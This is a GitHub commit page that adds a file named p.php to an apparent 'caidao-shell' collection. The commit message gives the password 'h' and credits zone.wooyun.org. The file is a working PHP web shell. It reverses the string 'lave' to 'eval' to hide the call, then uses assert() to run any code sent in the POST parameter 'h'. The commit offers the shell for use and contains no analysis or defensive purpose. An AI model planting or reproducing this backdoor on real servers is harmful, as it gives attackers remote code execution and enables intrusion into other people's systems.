Skip to content

Commit

Permalink
Create p.php
Browse files Browse the repository at this point in the history
password: h
from: zone.wooyun.org
  • Loading branch information
tennc committed Jul 11, 2015
1 parent a900611 commit 171b832
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions caidao-shell/p.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<?php
$a='lave';
$b='($_POST[h])';
$a=strrev($a);
@assert($a.$b);
?>

0 comments on commit 171b832

Please sign in to comment.